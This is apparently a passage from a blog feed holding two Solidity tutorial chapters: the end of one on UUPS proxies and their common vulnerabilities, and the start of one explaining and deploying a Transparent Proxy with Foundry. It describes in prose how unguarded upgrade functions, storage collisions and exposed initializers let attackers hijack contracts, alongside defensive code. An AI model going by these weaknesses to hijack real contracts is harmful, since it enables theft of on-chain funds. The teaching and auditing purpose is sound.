This shows how the proxy seamlessly delegates calls to the implementation while keeping its own state intact.

#### **4\. Upgrading the Implementation**

&lt;details&gt;
&lt;summary&gt;The real highlight of the script is the upgrade process:&lt;/summary&gt;

```solidity
proxy.upgradeTo(0xDc64a140Aa3E981100a9becA4E685f962f0cF6C9);
console.log(&quot;Version: &quot;, proxy.getVersion());

```
&lt;/details&gt;


Here’s how it works:

-   **`upgradeTo(0xDc64...)`**: This updates the proxy to point to a new implementation contract. The address `0xDc64...` represents the new implementation (`ImplementationV2`, for example).
-   **`getVersion()`**: After the upgrade, this function checks the version of the new implementation, which should now reflect the new version (e.g., `&quot;v2&quot;`).

The magic here is that the proxy’s address stays the same, so users don’t need to update anything on their end. All changes happen under the hood.

#### **5\. Verifying the Upgrade**

Finally, the script retrieves the stored value to confirm that the proxy’s state is intact even after the upgrade:

```solidity
console.log(&quot;The value is: &quot;, proxy.getStoredValue());

```

Since the proxy holds the storage, the value `150` stored earlier is still available after upgrading the implementation. This demonstrates the power of the UUPS Proxy pattern: you can enhance functionality without losing data or requiring users to switch addresses.

#### **6\. Stopping Transactions**

&lt;details&gt;
&lt;summary&gt;The script ends by stopping the broadcast of transactions:&lt;/summary&gt;

```solidity
vm.stopBroadcast();

```
&lt;/details&gt;


This ensures that no unintended actions are sent to the blockchain after the script completes.

![](/content/images/2025/01/image-13.png)

Running a script to interact with and upgrade the implementation

# **Common Vulnerabilities in UUPS Proxies**

Now that we&apos;ve covered the structure and benefits of UUPS proxies, it’s time to discuss their **vulnerabilities**. Since **UUPS shifts the upgrade logic from the proxy to the implementation contract**, it introduces new attack surfaces that must be carefully managed. While some risks overlap with Transparent Proxies, UUPS has unique weaknesses that require additional precautions.

Let’s break down the most common vulnerabilities and how to mitigate them.

## **Lack of Access Control (Anyone Can Upgrade the Proxy)**

Since the upgrade function is in the **implementation contract**, poor access control can allow **anyone to call `upgradeTo`**, replacing the implementation with a malicious one.

#### **How It Happens:**

-   The `upgradeTo` function is **left public** or does not properly check the admin role.
-   A **stolen admin private key** is used to upgrade to a malicious contract.
-   The contract lacks **multi-signature (multi-sig) governance**, making upgrades too easy.
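
A common mitigation, sketched here along the lines of OpenZeppelin's `UUPSUpgradeable` (which you should prefer over hand-rolling), is to funnel every upgrade through a single authorization hook. The helpers assumed below (`_setImplementation`, `_getAdmin`) mirror the ones shown earlier in this chapter:

```solidity
function upgradeTo(address newImplementation) external {
    _authorizeUpgrade(newImplementation);
    require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);
    _setImplementation(newImplementation);
}

// Reverts unless the caller is allowed to upgrade; in production, extend
// this check with a multi-sig or timelock rather than a single EOA.
function _authorizeUpgrade(address) internal view {
    require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
}
```

Centralizing the check in one hook means a future version can't accidentally ship an upgrade path that forgets the admin comparison.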

## **Storage Collisions (Breaking State Between Upgrades)**

UUPS proxies **share storage with their implementations**, meaning that **misaligned storage layouts** in new implementations can **corrupt contract state**.

#### **How It Happens:**

-   A new implementation **reorders or removes storage variables**, shifting storage slots.
-   Developers **forget to follow EIP-1967**, causing unexpected overlaps.
-   The upgrade process **accidentally overwrites the admin or implementation slot**, making the contract unusable.
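
The conventional safeguard is an append-only layout: never reorder or remove existing variables, only add new ones after them. A sketch of a safe `ImplementationV2` for the contract in this chapter (the `__gap` reservation is the pattern OpenZeppelin formalizes as "storage gaps"):

```solidity
contract ImplementationV2 {
    // Keep V1's layout byte-for-byte: same variables, same order.
    uint256 public storedValue;

    // New state goes strictly after the existing layout.
    uint256 public newFeatureFlag;

    // Reserved slots so future versions can add variables without
    // shifting the layout of anything declared later or inherited.
    uint256[48] private __gap;
}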

## **Losing Admin Control (Permanent Loss of Authority)**

If the **admin address is set to `address(0)`**, the contract **becomes unmanageable**, making further upgrades impossible.

#### **How It Happens:**

-   The **admin address is accidentally removed** in an upgrade.
-   A developer **tries to disable upgrades** but unintentionally makes the contract unmanageable.
-   An attacker tricks the contract into setting an **unreachable admin address**.

## **Lack of Access Control in Implementation Functions**

Even if the proxy enforces strict access control, **the implementation contract itself might expose sensitive functions**. If the implementation is not properly secured, **attackers can call its functions directly**, bypassing the intended proxy restrictions.

#### **How It Happens:**

1.  **The implementation has critical functions (e.g., `upgradeTo`, `setAdmin`, `withdrawFunds`) left public or insufficiently restricted.**
2.  **An attacker calls these functions directly** on the implementation contract instead of through the proxy.
3.  **Because the implementation has its own storage, separate from the proxy’s**, direct calls may not behave as expected, but in some cases they are still dangerous.
4.  **An unprotected direct call can take over the implementation itself**—for example, through an exposed initializer or an unguarded `selfdestruct`—bricking or hijacking every proxy that delegates to it.

# Exploring the Remaining Proxy Patterns and Their Vulnerabilities

After looking at UUPS and Transparent Proxies, it’s time to explore the other proxy patterns available. Each comes with unique strengths and use cases but also introduces specific vulnerabilities that need to be addressed. Here’s a breakdown of the major proxy types, their features, and the common pitfalls they might encounter.

## **Beacon Proxy: Centralized Logic for Shared Updates**

The Beacon Proxy pattern introduces a central contract, called the **Beacon**, which stores the address of the implementation. Multiple proxies use the same Beacon to determine where to delegate calls, making it a shared brain for upgradeable logic. When you upgrade the implementation in the Beacon, every proxy connected to it is updated simultaneously.

```mermaid
graph LR
    Beacon[&quot;Beacon Contract&quot;]
    Implementation[&quot;Implementation Logic&quot;]
    Proxy1[&quot;Proxy Instance 1&quot;]
    Proxy2[&quot;Proxy Instance 2&quot;]
    Proxy3[&quot;Proxy Instance 3&quot;]

    Proxy1 --&gt;|Delegate Calls| Implementation
    Proxy2 --&gt;|Delegate Calls| Implementation
    Proxy3 --&gt;|Delegate Calls| Implementation
    Implementation &lt;--&gt;|Controlled By| Beacon

```

**Key Features:**

-   Shared implementation across multiple proxies, reducing deployment costs.
-   Efficient for factory-like setups where all instances require the same logic.

**Main Vulnerabilities:**

-   **Centralization Risk:** If the Beacon contract is compromised, every linked proxy becomes vulnerable. An attacker could redirect all proxies to a malicious implementation.
-   **Unprotected Upgrades:** Without proper access control, the `updateImplementation` function in the Beacon could be exploited to point proxies to an invalid or malicious contract.
-   **Storage Collisions:** Although the Beacon handles the implementation, the proxies themselves hold state. If storage layouts between the proxies and implementation are not aligned, this can lead to corrupted or overwritten data.

## **Minimal Proxy (Clones): Lightweight and Cost-Effective**

Minimal proxies, often implemented using the **EIP-1167** standard, are hyper-efficient proxies designed for gas savings. They delegate all function calls to a single implementation contract. Their minimal bytecode reduces deployment costs, making them ideal for scenarios where you need many identical instances of a contract.

```mermaid
graph LR
    subgraph Proxy1
        P1[&quot;Clone 1 (Minimal Proxy)&quot;]
    end
    subgraph Proxy2
        P2[&quot;Clone 2 (Minimal Proxy)&quot;]
    end
    subgraph Proxy3
        P3[&quot;Clone 3 (Minimal Proxy)&quot;]
    end
    I[&quot;Implementation&quot;]

    P1 --&gt;|Delegate| I
    P2 --&gt;|Delegate| I
    P3 --&gt;|Delegate| I

```

**Key Features:**

-   Extremely low gas costs for deployment.
-   Ideal for mass production of proxies with identical logic.

**Main Vulnerabilities:**

-   **No Built-in Upgradeability:** Minimal proxies are not inherently upgradeable. While you could create a mechanism for upgrading the implementation they delegate to, this is not part of their default design.
-   **Shared Implementation Risks:** Since all clones rely on the same implementation, any bug or vulnerability in the implementation impacts all proxies.
-   **Oversight on Initialization:** Developers must manually initialize the state of each proxy, and improper initialization can lead to inconsistent or exploitable states.
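
Because clones share code but not state, each clone must be initialized exactly once after deployment. A minimal guard, sketching the idea behind OpenZeppelin's `Initializable` (names here are illustrative):

```solidity
contract CloneTarget {
    bool private _initialized;
    address public owner;

    // Replaces the constructor, which never runs against a clone's own
    // storage; the flag prevents anyone from re-initializing later.
    function initialize(address owner_) external {
        require(!_initialized, &quot;Already initialized&quot;);
        _initialized = true;
        owner = owner_;
    }
}
```

Factories typically deploy the clone and call `initialize` in the same transaction, so an attacker never gets a window to claim ownership first.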

## **Diamond Proxy (EIP-2535): Modular and Extensible**

The Diamond Proxy is the most complex and flexible pattern, allowing a single proxy to delegate calls to multiple implementation contracts, called **facets**. Each facet handles a specific set of functions, enabling modularity and extensibility.

```mermaid
graph TD
    DP[&quot;Diamond Proxy&quot;]
    F1[&quot;Facet 1 (Core Logic)&quot;]
    F2[&quot;Facet 2 (Upgrade Logic)&quot;]
    F3[&quot;Facet 3 (Extensions)&quot;]

    DP --&gt;|Delegate| F1
    DP --&gt;|Delegate| F2
    DP --&gt;|Delegate| F3

```

**Key Features:**

-   Supports modular architecture, where functionality is split across multiple contracts.
-   Allows upgrading individual facets without affecting others.

**Main Vulnerabilities:**

-   **Increased Attack Surface:** Each facet introduces its own entry points and potential vulnerabilities. A single compromised facet can jeopardize the entire system.
-   **Complex Storage Management:** Managing shared storage across multiple facets requires extreme care. A mismatch in storage layouts can corrupt data or cause unexpected behavior.
-   **Access Control Mismanagement:** Ensuring consistent access control across all facets is challenging. If one facet has weaker controls, it could be exploited to affect the entire system.

## **Static Proxy: Immutable Logic, Upgradeable State**

In a Static Proxy, the logic is fixed and cannot be changed. The proxy delegates calls to a single implementation that remains constant, while the proxy itself manages the state. This eliminates the risk of faulty upgrades but sacrifices flexibility.

```mermaid
graph LR
    SP[&quot;Static Proxy&quot;]
    I[&quot;Static Implementation&quot;]
    S[&quot;State Storage&quot;]

    SP --&gt;|Delegate| I
    SP --&gt;|Store State| S

```

**Key Features:**

-   Immutable logic, making it easier to audit and secure.
-   Proxy handles state, while the implementation remains static.

**Main Vulnerabilities:**

-   **Permanent Bugs:** If there’s a bug in the implementation, it cannot be fixed because the logic is immutable. The entire system would need to be redeployed, potentially losing state.
-   **State Migration Risks:** When deploying a new proxy to replace the old one, migrating the state requires careful handling. Errors in migration can lead to data loss or inconsistencies.
-   **Limited Flexibility:** The inability to update logic makes it unsuitable for systems that need to adapt to changing requirements or add new features.

# **Conclusions**

By now, you should have a **very clear** understanding of **UUPS Proxies**, their **benefits**, and the **many ways they can be turned into a disaster** if not handled properly. The shift of **upgrade control from the proxy to the implementation** makes them **more efficient**, but at the same time, it **widens the attack surface**. If access control is weak, an attacker can **upgrade your contract to literally anything**—and you don’t want to wake up one day to find your proxy forwarding calls to a black hole.

What have we learned?

-   **Upgradeability is powerful—but dangerous.** Anything that changes state **needs to be locked down**.
-   **Storage collisions are real.** Misalign your storage, and suddenly, variables start behaving like a drunk oracle.
-   **Never assume that functions will only be called through the proxy.** Attackers _love_ when implementations leave critical functions exposed.
-   **Losing control of an upgrade mechanism is worse than not having one at all.** A misplaced `address(0)` or bad ACL, and your contract is frozen in time—or worse, permanently hijacked.

And the best part? **This is just one type of proxy.**

The world of **proxy-based upgrades is vast**, and UUPS is far from the only game in town. We’ve **only scratched the surface** of how developers attempt to balance **upgradeability and security**. Up next, we’ll **tear apart** some other common proxy architectures—**Beacon Proxies, Minimal Proxies, Diamond Proxies, and Static Proxies**—each with its own unique **design flaws** just waiting to be exploited.

Because at the end of the day, **understanding how to break something is the best way to know how to secure it.** 🚀

### **References**

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Understanding delegatecall and Low-Level Functions. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call)
-   **Trail of Bits** - Common Pitfalls with delegatecall. _&quot;Trail of Bits Blog.&quot;_ Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. _&quot;Ethereum Whitepaper.&quot;_ Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. _&quot;Anvil Documentation.&quot;_ Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. _&quot;OpenZeppelin Contracts Documentation.&quot;_ Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **EIP-1967** - Standardized Storage Slots for Proxy Contracts. _&quot;Ethereum Improvement Proposals.&quot;_ Available at: [https://eips.ethereum.org/EIPS/eip-1967](https://eips.ethereum.org/EIPS/eip-1967)
-   **EIP-1822** - Universal Upgradeable Proxy Standard (UUPS). _&quot;Ethereum Improvement Proposals.&quot;_ Available at: [https://eips.ethereum.org/EIPS/eip-1822](https://eips.ethereum.org/EIPS/eip-1822)
-   **OpenZeppelin UUPS Proxies** - Best Practices for Secure Upgradeable Contracts. _&quot;OpenZeppelin Documentation.&quot;_ Available at: [https://docs.openzeppelin.com/contracts/4.x/api/proxy](https://docs.openzeppelin.com/contracts/4.x/api/proxy)
-   **Smart Contract Security Best Practices** - A Comprehensive Guide to Securing Upgradeable Contracts. _&quot;Consensys Diligence.&quot;_ Available at: https://consensys.net/diligence/blog/</content:encoded><author>Ruben Santos</author></item><item><title>Transparent Proxies: The Key to Upgradeable Contracts Without Breaking a Sweat</title><link>https://www.kayssel.com/post/web3-11</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-11</guid><description>Transparent Proxies allow smart contracts to be upgraded without changing their address, forwarding calls to implementation contracts while preserving state. In this chapter, we deployed, interacted with, and upgraded a proxy, exploring its architecture and benefits.</description><pubDate>Sun, 26 Jan 2025 09:28:45 GMT</pubDate><content:encoded># Proxies: The Art of Staying Upgradeable Without Losing Your Address

Welcome to the next stop on your Web3 journey—where we explore the not-so-hidden magic behind upgradeable smart contracts. Imagine this: you’ve deployed a smart contract, and everything seems perfect… until someone points out a vulnerability, or worse, you realize you forgot a crucial feature. In traditional deployment, you’d be stuck. But with proxies, you’ve got a lifeline. No need to panic, no need to redeploy—just upgrade the logic while keeping everything else intact. It’s like swapping out the engine of a car without asking the driver to leave.

In this chapter, we’re cracking open **Transparent Proxies**, the simplest tool in the upgradeable smart contract arsenal. They’re straightforward, efficient, and designed to make upgrades seamless without breaking the contract’s address. Why does this matter? Because keeping the address stable is critical—your users, dApps, and auditors rely on that consistency. Proxies allow you to iterate on your code while preserving state and relationships. In short: they give you flexibility while reducing chaos.

Here’s the plan. We’ll start by demystifying how Transparent Proxies work, walking through their architecture and key components (storage slots, delegation, admin control—you name it). Then, we’ll jump into the fun part: deploying a proxy, connecting it to an implementation, and even upgrading it with new logic. Along the way, we’ll break down the code so you can see exactly how everything operates under the hood. This isn’t just a theory session—it’s hands-on, and by the end, you’ll be armed with the knowledge to understand how upgradeable contracts work and how to spot potential security issues.

So, if you’ve ever wondered how a smart contract can evolve without breaking everything around it—or if you’re itching to get a deeper look into how the upgrade process can go wrong (or right)—this chapter has you covered. Let’s dive in and see why proxies are the unsung heroes of upgradeable architectures. 🚀

# **What Are Proxies? The Magic Trick Behind Upgradeable Smart Contracts**

Imagine you own a restaurant, and suddenly you realize the menu is full of mistakes (who thought &quot;screw soup&quot; was a good idea?). Instead of shutting down the restaurant, demolishing the building, and starting over, you simply update the menu. That’s essentially how proxies work in the world of smart contracts!

A proxy is like the manager of that restaurant: it doesn’t hold the menu (the actual logic of your smart contract) but knows exactly where to find it. When a customer (or in this case, a user) comes in and places an order (calls a function), the proxy takes the request and sends it to the kitchen (the implementation contract) to get it done.

Here’s the fun part: if your kitchen (contract logic) has an issue—say, it serves burnt toast as a delicacy—you can build a shiny new kitchen (deploy a new implementation contract) and tell your manager (the proxy) to send all future orders there instead. And voilà, your restaurant (contract address) remains the same for customers, but now you’ve got a better kitchen running the show.

Proxies are the superheroes of **blockchain development** because they allow smart contracts to be **upgraded** without changing their address. This means users don’t need to hunt for a new contract every time you improve the logic or fix a bug. It’s like getting a software update for your favorite app, but on the blockchain.

So, next time someone mentions “proxies,” just think of them as that magical restaurant manager who keeps everything running smoothly, even when the menu gets a makeover. Bon appétit, blockchain style! 🍽️✨

# Transparent Proxies: The Simplest Tool for Upgradeable Smart Contracts

When it comes to upgradeable smart contracts, transparent proxies are like the minimalist’s dream: simple, efficient, and highly functional. They allow you to swap out your smart contract’s logic (the **implementation**) without ever changing its address. That means your users don’t have to worry about keeping track of new contract addresses—they can keep interacting with the same one as if nothing changed.

The key feature of transparent proxies? **They manage the upgrade logic directly within the proxy contract.** Unlike more advanced patterns (like UUPS proxies), where the implementation contract might handle its own upgrades, a transparent proxy centralizes everything. This makes it perfect for straightforward use cases where simplicity is a priority.
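For context, the pattern takes its name from caller-based routing: in canonical transparent proxies (for example OpenZeppelin&apos;s `TransparentUpgradeableProxy`), calls from the admin are answered by the proxy itself and never delegated, while every other caller is forwarded untouched. A rough sketch of that idea (hypothetical code, not part of the example below):

```solidity
// Hypothetical caller-based routing inside a transparent proxy fallback.
// Admin calls are handled by the proxy itself (upgrade management), so a
// function-selector clash between proxy and implementation can never trick
// the admin into executing implementation code by accident.
fallback() external payable {
    if (msg.sender == _getAdmin()) {
        _handleAdminCall(); // e.g. dispatch upgradeTo(...) on the proxy itself
    } else {
        _delegate(); // everyone else is transparently forwarded
    }
}
```

The simplified proxy in this chapter skips this routing and instead guards `upgradeTo` with a `require`, which is easier to read but leaves selector clashes theoretically possible.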

Let’s break this down using an example.

&lt;details&gt;
&lt;summary&gt;TransparentProxy code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract TransparentProxy {
    // Storage slot for the implementation address
    // (custom keccak-derived slot; note this is NOT the canonical EIP-1967 value,
    //  which is bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1))
    bytes32 private constant IMPLEMENTATION_SLOT = keccak256(&quot;proxy.implementation&quot;);
    // Storage slot for the admin address (same caveat as above)
    bytes32 private constant ADMIN_SLOT = keccak256(&quot;proxy.admin&quot;);

    event UpgradeAttempt(address sender, address admin, address newImplementation);

    // Constructor to initialize the implementation and admin
    constructor(address initialImplementation, address initialAdmin) {
        require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
        require(initialAdmin != address(0), &quot;Admin cannot be zero address&quot;);

        _setImplementation(initialImplementation);
        _setAdmin(initialAdmin);
    }

    // Function to update the implementation address
    function upgradeTo(address newImplementation) external {
        emit UpgradeAttempt(msg.sender, _getAdmin(), newImplementation);
        require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
        require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);

        _setImplementation(newImplementation);
    }

    // Fallback function to delegate calls to the implementation
    fallback() external payable {
        _delegate();
    }

    // Receive function to handle plain Ether transfers
    receive() external payable {
        _delegate();
    }

    // Public getter to expose the admin address
    function getAdmin() public view returns (address) {
        return _getAdmin();
    }

    // Internal function to perform the delegatecall to the implementation
    function _delegate() internal {
        address impl = _getImplementation();
        require(impl != address(0), &quot;Implementation not set&quot;);

        assembly {
            // Copy calldata to memory
            calldatacopy(0, 0, calldatasize())

            // Delegate call to the implementation contract
            let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

            // Copy returndata to memory
            returndatacopy(0, 0, returndatasize())

            // Return or revert based on the result
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Internal function to retrieve the implementation address
    function _getImplementation() internal view returns (address impl) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            impl := sload(slot)
        }
    }

    // Internal function to set the implementation address
    function _setImplementation(address newImplementation) internal {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }

    // Internal function to retrieve the admin address
    function _getAdmin() internal view returns (address adm) {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            adm := sload(slot)
        }
    }

    // Internal function to set the admin address
    function _setAdmin(address newAdmin) internal {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            sstore(slot, newAdmin)
        }
    }
}

```
&lt;/details&gt;


## The Transparent Proxy in Action

Here’s a basic implementation of a transparent proxy. Don’t worry—I’ll walk you through each part to make it as clear as possible.

#### Defining Storage Slots

The proxy needs two key storage slots:

1.  **The implementation slot**: This holds the address of the contract with the actual logic.
2.  **The admin slot**: This stores the address of the admin, who has the power to upgrade the implementation.

```solidity
// Storage slot for the implementation address
// (custom keccak-derived slot; note this is NOT the canonical EIP-1967 value,
//  which is bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1))
bytes32 private constant IMPLEMENTATION_SLOT = keccak256(&quot;proxy.implementation&quot;);
// Storage slot for the admin address (same caveat as above)
bytes32 private constant ADMIN_SLOT = keccak256(&quot;proxy.admin&quot;);

```

These slots are derived with `keccak256`, which makes it statistically impossible for the implementation contract&apos;s sequentially numbered variables to land on them. This is the approach standardized by **EIP-1967**, although strictly speaking the standard uses the labels `eip1967.proxy.implementation` and `eip1967.proxy.admin` and subtracts 1 from the hash so the final slot has no known preimage. Think of these as clearly labeled drawers in the proxy&apos;s filing cabinet, so you always know where things are.
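For reference, here are the canonical EIP-1967 constants, precomputed the way production proxies (such as OpenZeppelin&apos;s) define them. This is a sketch for comparison; the example proxy in this chapter uses its own shorter labels:

```solidity
// Canonical EIP-1967 slots, written as precomputed constants.
// bytes32(uint256(keccak256(&quot;eip1967.proxy.implementation&quot;)) - 1):
bytes32 internal constant EIP1967_IMPLEMENTATION_SLOT =
    0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
// bytes32(uint256(keccak256(&quot;eip1967.proxy.admin&quot;)) - 1):
bytes32 internal constant EIP1967_ADMIN_SLOT =
    0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103;
```

The minus one matters: since nobody knows a keccak preimage for the final value, no mapping or dynamic array in the implementation can be crafted to collide with it. Using the standard values also lets tooling such as block explorers locate the implementation automatically.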

#### Initializing the Proxy

When deploying the proxy, you need to set:

-   The initial **implementation contract** (where the logic lives).
-   The **admin** address (who’s in charge of upgrades).

```solidity
constructor(address initialImplementation, address initialAdmin) {
    require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
    require(initialAdmin != address(0), &quot;Admin cannot be zero address&quot;);

    _setImplementation(initialImplementation);
    _setAdmin(initialAdmin);
}

```

The constructor checks that both addresses are valid (not `address(0)`) and then stores them securely in their respective slots. This is like appointing a manager (admin) and telling them where the kitchen (implementation) is located.

#### Handling Upgrades

The `upgradeTo` function is the heart of the proxy’s admin-only control. Here’s how it works:

```solidity
function upgradeTo(address newImplementation) external {
    emit UpgradeAttempt(msg.sender, _getAdmin(), newImplementation);
    require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
    require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);

    _setImplementation(newImplementation);
}

```

1.  **Authorization Check**: It ensures only the admin (stored in the `ADMIN_SLOT`) can call this function.
2.  **Validation**: It verifies the new implementation address isn’t empty.
3.  **Update**: It sets the new implementation address in the `IMPLEMENTATION_SLOT`.

This function also emits an event, `UpgradeAttempt`, logging who tried to upgrade and the proposed implementation address. Note that it is emitted before the authorization check; since a failed `require` reverts the entire transaction, the event only ends up on-chain for successful upgrades.

#### Delegating Calls

The proxy itself doesn’t execute any logic. Instead, it forwards all incoming calls to the implementation contract using a fallback function. Here’s the magic:

```solidity
fallback() external payable {
    _delegate();
}

receive() external payable {
    _delegate();
}

```

The `fallback` function handles every incoming call that carries calldata (and doesn&apos;t match one of the proxy&apos;s own functions), while the `receive` function deals with plain Ether transfers with empty calldata. Both call `_delegate`, which is where the real action happens.

#### The `_delegate` Function

&lt;details&gt;
&lt;summary&gt;This is where the proxy forwards calls to the implementation contract:&lt;/summary&gt;

```solidity
function _delegate() internal {
    address impl = _getImplementation();
    require(impl != address(0), &quot;Implementation not set&quot;);

    assembly {
        // Copy calldata to memory
        calldatacopy(0, 0, calldatasize())

        // Delegate call to the implementation contract
        let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

        // Copy returndata to memory
        returndatacopy(0, 0, returndatasize())

        // Return or revert based on the result
        switch result
        case 0 { revert(0, returndatasize()) }
        default { return(0, returndatasize()) }
    }
}

```
&lt;/details&gt;


Let’s break it down:

1.  **Get the Implementation Address**: The proxy retrieves the current implementation address from the `IMPLEMENTATION_SLOT`.
2.  **Forward the Call**: It uses the `delegatecall` opcode to execute the function on the implementation contract.
3.  **Return Results**: The proxy copies any return data back to the caller or reverts if the call failed.

This process makes the proxy behave exactly like the implementation contract for external users. They’ll never know the difference.

#### Setting and Retrieving Slots

Finally, the proxy includes helper functions to read and write to the `ADMIN_SLOT` and `IMPLEMENTATION_SLOT`. These are used internally to manage the admin and implementation addresses.

```solidity
function _getImplementation() internal view returns (address impl) {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        impl := sload(slot)
    }
}

function _setImplementation(address newImplementation) internal {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        sstore(slot, newImplementation)
    }
}

function _getAdmin() internal view returns (address adm) {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        adm := sload(slot)
    }
}

function _setAdmin(address newAdmin) internal {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        sstore(slot, newAdmin)
    }
}

```

These functions use low-level assembly to interact directly with the contract’s storage slots, ensuring that the proxy always knows where to find the admin and implementation addresses.

# A Simple Implementation to Test the Proxy

To test our transparent proxy in action, we’ll use a straightforward contract: **ImplementationV1**. This contract includes a few basic functions, such as storing and retrieving a value, as well as a version identifier.

Here’s the code for **ImplementationV1**:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract ImplementationV1 {
    uint256 public storedValue;

    function getVersion() public pure returns (string memory) {
        return &quot;v1&quot;;
    }

    function setStoredValue(uint256 value) external {
        storedValue = value;
    }

    function getStoredValue() external view returns (uint256) {
        return storedValue;
    }
}

```

## What’s Happening Here?

1.  **`getVersion()`**: This function simply returns the version of the contract (in this case, `&quot;v1&quot;`). It’s a quick way to confirm which implementation the proxy is pointing to after an upgrade.
2.  **`setStoredValue()`**: This allows us to store a value in the contract. It demonstrates how state is preserved across upgrades, as the state lives in the proxy, not the implementation.
3.  **`getStoredValue()`**: This retrieves the stored value, giving us an easy way to test the logic and verify that everything is working as expected.

## What Comes Next?

When we decide to upgrade, we’ll replace **ImplementationV1** with a new version (e.g., **ImplementationV2**) that includes additional functionality or fixes. For example, we might update the `getVersion()` function to return `&quot;v2&quot;`. This allows us to see the proxy&apos;s magic in action—changing the logic without losing access to the stored data.

Stay tuned, because next, we’ll deploy **ImplementationV1**, connect it to our proxy, and demonstrate how to upgrade seamlessly!
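The chapter doesn&apos;t list **ImplementationV2**, but as a sketch, a minimal version might change nothing except the version string. The crucial constraint is keeping the storage layout identical (hypothetical code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical ImplementationV2: same storage layout as V1 (storedValue stays
// in slot 0), with only the version string changed. Preserving the layout is
// what keeps the proxy state readable after the upgrade.
contract ImplementationV2 {
    uint256 public storedValue; // must remain the first declared variable

    function getVersion() public pure returns (string memory) {
        return &quot;v2&quot;;
    }

    function setStoredValue(uint256 value) external {
        storedValue = value;
    }

    function getStoredValue() external view returns (uint256) {
        return storedValue;
    }
}
```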

# Testing the Transparent Proxy: Deploying and Interacting

Now that we’ve built our **Transparent Proxy** and **ImplementationV1** contracts, it’s time to see them in action. For this, we’ll deploy the contracts and interact with them using **Foundry**, an excellent toolkit for Ethereum developers. To simulate the blockchain environment, we’ll rely on **Anvil**, Foundry’s local testnet. The following script takes care of deploying both the implementation and proxy contracts while ensuring everything is initialized properly.

#### The Deployment Script

The deployment starts with the **`run()`** function. This function uses Foundry&apos;s scripting utilities to deploy the contracts to the blockchain.

```solidity
contract Deploy is Script {
    function run() external {
        // Start broadcasting transactions
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Step 1: Deploy the ImplementationV1 contract
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationV1 deployed at:&quot;, address(implementation));

        // Step 2: Deploy the Transparent Proxy contract
        TransparentProxy proxy = new TransparentProxy(address(implementation), vm.envAddress(&quot;ADMIN_ADDR&quot;));
        console.log(&quot;TransparentProxy deployed at:&quot;, address(proxy));

        // End broadcasting transactions
        vm.stopBroadcast();
    }
}

```

The script first starts broadcasting transactions by calling `vm.startBroadcast()` with the admin&apos;s private key (`ADMIN_KEY`), which is read from an environment variable so it stays out of the source code. This allows the admin to deploy and manage the contracts on the blockchain.

The first task is deploying **ImplementationV1**, which contains the logic for storing and retrieving values. The line `ImplementationV1 implementation = new ImplementationV1();` creates a new instance of this contract and logs its address to the console for reference. This contract acts as the &quot;kitchen&quot; we discussed earlier—the place where all the logic lives.

Next, the script deploys the **Transparent Proxy** by creating a new instance of it and passing two critical parameters: the address of the implementation contract (`address(implementation)`) and the admin’s address (`vm.envAddress(&quot;ADMIN_ADDR&quot;)`). These parameters initialize the proxy, linking it to the implementation contract and setting the admin who will manage future upgrades. The proxy’s address is also logged for easy access.

Once both contracts are deployed, the script ends by calling `vm.stopBroadcast()`, signaling that no more transactions will be sent.

#### Running the Deployment Script

To deploy the contracts, you’ll first need to start Anvil. This creates a local Ethereum blockchain that mimics a real network, complete with accounts and transaction history. You can start Anvil by running:

```bash
anvil

```

Next, set up your environment variables to securely pass the admin’s private key and address to the script. These can be added to a `.env` file like so:

```bash
ADMIN_KEY=&lt;your-private-key&gt;
ADMIN_ADDR=&lt;your-admin-address&gt;

```

